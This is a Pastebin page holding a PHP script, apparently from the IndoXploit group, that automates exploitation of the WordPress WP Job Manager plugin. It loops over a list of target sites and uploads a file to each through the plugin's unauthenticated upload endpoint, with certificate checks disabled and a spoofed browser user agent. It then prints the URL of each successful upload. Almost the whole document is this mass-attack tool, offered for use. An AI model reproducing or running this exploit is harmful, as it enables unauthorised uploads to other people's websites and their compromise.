SHARE
TWEET

Auto Exploiter WP Job-Manager - IndoXploit

choirurrizal Jul 26th, 2017 (edited) 81 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. # Tu5b0l3d - IndoXploit
  3. # http://www.indoxploit.or.id/2017/06/auto-exploit-plugin-wp-job-manager.html
  4.  
  5.  
  6. $nama = "target.html";
  7. $buka=fopen("$nama","r");
  8. $size=filesize("$nama");
  9. $baca=fread($buka,$size);
  10. $sites = explode("\r\n", $baca);
  11. foreach($sites as $site){
  12.     if(preg_match("#http://#", $site)) {
  13.     $suu = $site;
  14.  } else {
  15.    $suu = "http://".$site;
  16.  }
  17.     echo "$suu ->";
  18.     $file = "k.png";
  19.     $site = "$suu/jm-ajax/upload_file/";
  20.     $post = array(
  21.                     "file" => "@$file",
  22.                     );
  23. $ch = curl_init ("$site");
  24. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  25. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  26. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  27. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  28. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  29. curl_setopt ($ch, CURLOPT_POST, 1);
  30. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  31. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  32. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  33. $data6 = curl_exec ($ch);
  34.         if (preg_match("/$file/i", $data6)){
  35.             $save = "$suu/wp-content/uploads/job-manager-uploads/file/2017/06/$file";
  36.                 echo  " \n$save\n";
  37.              
  38.         }else{
  39.                 echo " \nNo\n"; }
  40.     }
  41.    
  42.  
  43. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top